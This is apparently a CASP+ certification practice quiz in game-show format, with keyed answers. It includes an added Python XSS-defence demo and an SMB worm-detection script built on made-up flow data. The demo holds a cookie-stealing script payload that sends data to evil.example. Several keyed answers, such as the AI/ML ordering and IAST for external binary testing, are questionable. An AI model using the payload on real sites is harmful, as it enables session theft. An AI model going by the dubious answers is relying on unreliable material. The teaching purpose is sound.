Risk Management
Cryptography & PKI
Incident Response & Forensics
Security Architecture
General CASP Knowledge
100

Which of the following is the formula for SLE (Single Loss Expectancy)?

A. SLE = AV (Asset Value) × EF (Exposure Factor)

B. SLE = AV / EF

C. SLE = ARO (Annual Rate of Occurrence) × EF

D. SLE = ARO × AV

A. SLE = AV (Asset Value) × EF (Exposure Factor)

100

You have been asked by a member of senior management to explain the importance of encryption and define what symmetric encryption offers. Which of the following offers the best explanation?

A. Nonrepudiation

B. Confidentiality

C. Hashing

D. Privacy and authentication

B. Confidentiality

100

During the lessons learned, your team is conducting an analysis of the incident playbook. What would best mitigate and manage the effects of an incident?

A. Modifying the scenario the risk is based on

B. Developing an agenda for recovery

C. Choosing the members of the recovery team

D. Implementing procedural controls

D. Implementing procedural controls

100

Sally’s CISO asked her to recommend an intrusion system to recognize intrusions traversing the network and send email alerts to the IT staff when one is detected. What type of intrusion system does the CISO want?

A. HIDS

B. NIDS

C. HIPS

D. NIPS

B. NIDS

100

Your DevOps team decided to use containers because they allow running applications on any hardware. What is the first thing your team should do to have a secure container environment?

A. Install IPS.

B. Lock down Kubernetes and monitor registries.

C. Configure antimalware and traffic filtering.

D. Disable services that are not required and install monitoring tools.

D. Disable services that are not required and install monitoring tools.

200

Which of the following is not an advantage of qualitative risk assessments?

A. Speed

B. Use of numeric dollar values

C. Based on CIA

D. Performed by a team

B. Use of numeric dollar values

200

A co-worker is concerned about the veracity of a claim because the sender of an email denies sending it. The co-worker wants a way to prove the authenticity of an email. Which would you recommend?

A. Hashing

B. Digital signature

C. Symmetric encryption

D. Asymmetric encryption

B. Digital signature

200

After an incident, it is important for you to create a lessons learned document. By conducting this critique, you evaluate the effectiveness of the response. With that after-incident mindset, what is the most important result you can derive from this document?

A. Areas for improvement

B. Magnitude of the problem

C. Proper assessment of an incident

D. Security assessment awareness

A. Areas for improvement

200

**DAILY DOUBLE**

The IT department decided to implement a security appliance in front of their web servers to inspect HTTP/HTTPS/SOAP traffic for malicious activity. Which of the following is the BEST solution to use?

A. Screened host firewall

B. Packet filter firewall

C. DMZ

D. WAF (Web Application Firewall)

D. WAF (Web Application Firewall)

200

The Hardware Security Module (HSM) and the Trusted Platform Module (TPM) provide what hardening technique?

A. Hard drive encryption

B. Trusted user authentication

C. Portable drive encryption

D. Protection against buffer overflow

A. Hard drive encryption

300

Implementation of a firewall best maps to which of the following?

A. Accept

B. Avoid

C. Mitigate

D. Transfer

C. Mitigate

300

You’ve discovered that an expired certificate is being used repeatedly to gain logon privileges. To what list should the certificate have been added?

A. Wildcard verification

B. Expired key revocation list

C. Online Certificate Status Department

D. Certificate revocation list (CRL)

D. Certificate revocation list (CRL)

300

Your company has a fence around the perimeter of its datacenter. A light sensor is connected to the fence and trips an alarm whenever something impacts the fence or the sensor detects movement and automatically records it on video. The datacenter is located in an area with tumbleweeds that often impact the fence in the fall, causing alarm fatigue. In this scenario, what alert type is causing alarm fatigue?

A. True positive

B. True negative

C. False positive

D. False negative

C. False positive

300

Your employees need internal access while traveling to remote locations. You need a service that enables them to securely connect back to a private corporate network from a public network to log into a centralized portal. You want the traffic to be encrypted. Which of the following is the BEST tool?

A. Wi-Fi

B. VPN (Virtual Private Network)

C. RDP (Remote Desktop Protocol)

D. NIC (Network Interface Card)

B. VPN (Virtual Private Network)

300

Olivia is the senior security analyst for a large online news organization. She was briefed by the incident response team that the organization has fallen victim to an XSS attack and malicious web scripting code had executed in a trusted web page. What does she do to prevent this from happening in the future?

A. Make sure the web application can validate and sanitize input.

B. Implement patch management immediately.

C. Request an external penetration test.

D. There is no way to prevent this from happening on a publicly facing web server.

A. Make sure the web application can validate and sanitize input.
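The answer has two halves: validate what comes in against an allow-list, and encode what goes out for the context it lands in. The Python example below is added to illustrate both and is not part of the original quiz; it uses only the standard library, and the payload, usernames, URLs and function names are constructed for the demo. The vulnerable renderer is kept deliberately unsafe so the difference is visible.

```python
import html
import re
from urllib.parse import urlparse

# Constructed attacker input: a stored-XSS style payload submitted as a comment body.
PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'


def render_comment_vulnerable(author: str, body: str) -> str:
    """String concatenation with untrusted data: the pattern behind the incident."""
    return f"<p><b>{author}</b>: {body}</p>"


def render_comment_safe(author: str, body: str) -> str:
    """Output encoding for the HTML text context: < > & " ' become entities."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>"


USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def validate_username(name: str) -> str:
    """Allow-list input validation: reject anything outside the expected alphabet."""
    if not USERNAME_RE.fullmatch(name):
        raise ValueError("invalid username")
    return name


def safe_link(url: str, text: str) -> str:
    """Attribute context needs more than escaping: html.escape leaves
    javascript:alert(1) intact inside an href, so the scheme is allow-listed too."""
    if urlparse(url).scheme.lower() not in ("http", "https"):
        raise ValueError("unsupported URL scheme")
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text)}</a>'


def contains_active_content(rendered: str) -> bool:
    """Crude check used by the demo: did a raw <script> tag survive into the page?"""
    return "<script" in rendered.lower()


def demo() -> dict:
    """Render the constructed payload both ways and report what reached the page."""
    return {
        "vulnerable_executes": contains_active_content(render_comment_vulnerable("mallory", PAYLOAD)),
        "safe_executes": contains_active_content(render_comment_safe("mallory", PAYLOAD)),
        "safe_output": render_comment_safe("mallory", PAYLOAD),
    }
```

Encoding is context-specific: `html.escape` is right for element text and, with `quote=True`, for quoted attribute values, but a value dropped into a URL, a JavaScript string or a CSS block needs the encoder for that context, which is why `safe_link` also restricts the scheme rather than relying on escaping alone.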

400

A(n) ___________________ is any agent, condition, or circumstance that could potentially cause harm to, loss of, or damage to an IT asset or data asset, or compromise it.

A. Vulnerability

B. Risk

C. Threat

D. Exposure

C. Threat

400

Which of the following is not an advantage of symmetric encryption?

A. It’s powerful.

B. A small key works well for bulk encryption.

C. It offers confidentiality.

D. Key exchange is easy.

D. Key exchange is easy.

400

Your breached organization is in the middle of an investigation, gathering evidence, performing forensics, and giving a presentation to upper management of all the proof gathered. What is the organization’s next action after all the technical incident forensics are completed?

A. Schedule a press conference.

B. Notify the authorities.

C. Notify all your vendors.

D. File for cyber-insurance coverage.

B. Notify the authorities.

400

After merging with a newly acquired company, Gavin comes to work Monday morning to find a metamorphic worm from the newly acquired network spreading through the parent organization. The security administrator isolated the worm using a network tap mirroring all the new network traffic and found it spreading on TCP port 445. What should Gavin advise the administrator to do immediately to minimize the attack?

A. Run Wireshark to watch for traffic on TCP port 445.

B. Update antivirus software and scan the entire enterprise.

C. Check your SIEM for alerts for any asset with TCP port 445 open.

D. Deploy an ACL to all HIPS: DENY-TCP-ANY-ANY-445.

D. Deploy an ACL to all HIPS: DENY-TCP-ANY-ANY-445.
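Blocking TCP/445 at every host stops the spread, but the administrator still has to find which hosts are already infected, and the tap data makes that possible: a worm sweeping for SMB listeners fans out to many distinct hosts on 445 in a short window, while a legitimate client talks to one or two file servers repeatedly. The Python example below is added here to show that detection logic and is not part of the original quiz. The flow records, addresses, threshold and window are constructed for the demo.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed flow records (not real traffic): "timestamp src dst dport proto".
# 10.20.5.17 sweeps a subnet on 445; 10.10.2.40/41 are ordinary file-server clients.
SAMPLE_FLOWS = """\
2024-05-13T08:00:01 10.20.5.17 10.10.1.5 445 tcp
2024-05-13T08:00:01 10.20.5.17 10.10.1.6 445 tcp
2024-05-13T08:00:02 10.20.5.17 10.10.1.7 445 tcp
2024-05-13T08:00:02 10.20.5.17 10.10.1.8 445 tcp
2024-05-13T08:00:03 10.20.5.17 10.10.1.9 445 tcp
2024-05-13T08:00:03 10.20.5.17 10.10.1.10 445 tcp
2024-05-13T08:00:04 10.20.5.17 10.10.1.11 445 tcp
2024-05-13T08:00:04 10.20.5.17 10.10.1.12 445 tcp
2024-05-13T08:00:05 10.20.5.17 10.10.1.13 445 tcp
2024-05-13T08:00:05 10.20.5.17 10.10.1.14 445 tcp
2024-05-13T08:00:06 10.20.5.17 10.10.1.15 445 tcp
2024-05-13T08:00:06 10.20.5.17 10.10.1.16 445 tcp
2024-05-13T08:00:07 10.10.2.40 10.10.1.5 445 tcp
2024-05-13T08:00:09 10.10.2.40 10.10.1.5 445 tcp
2024-05-13T08:00:15 10.10.2.40 10.10.1.5 445 tcp
2024-05-13T08:00:20 10.10.2.41 10.10.1.5 445 tcp
2024-05-13T08:00:20 10.10.2.41 10.10.1.6 445 tcp
2024-05-13T08:00:21 10.10.2.41 10.10.1.50 389 tcp
2024-05-13T08:00:22 10.10.2.41 10.10.1.50 53 udp
"""


def parse_flows(text: str) -> list:
    """Parse the space-separated records into (datetime, src, dst, dport, proto) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, proto = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(dport), proto.lower()))
    return flows


def smb_fanout(flows: list, threshold: int = 8, window: timedelta = timedelta(seconds=60)) -> dict:
    """Return {src: peak} for sources reaching >= threshold distinct hosts on TCP/445
    within any sliding window. Repeated contact with one server never trips this."""
    by_src = defaultdict(list)
    for ts, src, dst, dport, proto in flows:
        if proto == "tcp" and dport == 445:
            by_src[src].append((ts, dst))
    suspects = {}
    for src, events in by_src.items():
        events.sort()
        in_window = Counter()  # distinct destinations currently inside the window
        left, peak = 0, 0
        for ts, dst in events:
            in_window[dst] += 1
            while events[left][0] < ts - window:  # evict events older than the window
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            suspects[src] = peak
    return suspects
```

`smb_fanout(parse_flows(SAMPLE_FLOWS))` flags only the sweeping host, with its peak of 12 distinct targets; the clients that hit the same file server three times, or two servers, stay below the threshold. The flagged sources are the ones to isolate first while the DENY-TCP-ANY-ANY-445 rule from the answer keeps the rest of the fleet from being reached.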

400

You want your organization to benefit from artificial intelligence, but some in the application development department are confused about what AI actually is. Which statement is true? 

A. Artificial intelligence and machine learning are the same.

B. Machine learning and deep learning are the same.

C. Machine learning leads to deep learning, which leads to artificial intelligence.

D. Artificial intelligence parses big data to make decisions.

C. Machine learning leads to deep learning, which leads to artificial intelligence.

500

Which of the following types of testing is best described as manually performing the recovery steps without causing any real disruption?

A. Full interruption test

B. Checklist

C. Walk-through test

D. Simulation test

C. Walk-through test

500

3DES ECB is an example of which of the following?

A. Disk encryption

B. Block encryption

C. Port encryption

D. Record encryption

B. Block encryption

500

An attacker who compromised your network was caught and is being prosecuted. The logs from various pieces of equipment showing the attacker’s actions are one of the key pieces of evidence. When the logs were examined, it was determined that the timestamps are inaccurate and off by years. What is likely to happen to the logs as related to the prosecution of the attacker?

A. The defense attorney will likely be given an opportunity to correct the timestamps.

B. The judge will likely enable a third party to correct the timestamps.

C. The company will likely be given an opportunity to correct the timestamps, making them admissible in court.

D. The logs will likely not be allowed in court because the timestamps are incorrect.

D. The logs will likely not be allowed in court because the timestamps are incorrect.

500

You had your internal team do an analysis on compiled binaries to find errors in mobile and desktop applications. You would like an external agency to test them as well. Which of these tests BEST suits this need?

A. DAST (Dynamic Application Security Testing)

B. VAST (Vendor Application Security Testing)

C. IAST (Interactive Application Security Testing)

D. SAST (Static Application Security Testing)

C. IAST (Interactive Application Security Testing)

500

A vendor of new software that is deployed across your corporate network has announced a critical update is needed for a specific vulnerability. Your CIO wants to know what the vulnerability time has been. When can you give them that information?

A. After the patch is downloaded and installed in the affected system or device

B. When the patch is released and available to the public

C. When the patch is created by the vendor

D. When the vulnerability is discovered

A. After the patch is downloaded and installed in the affected system or device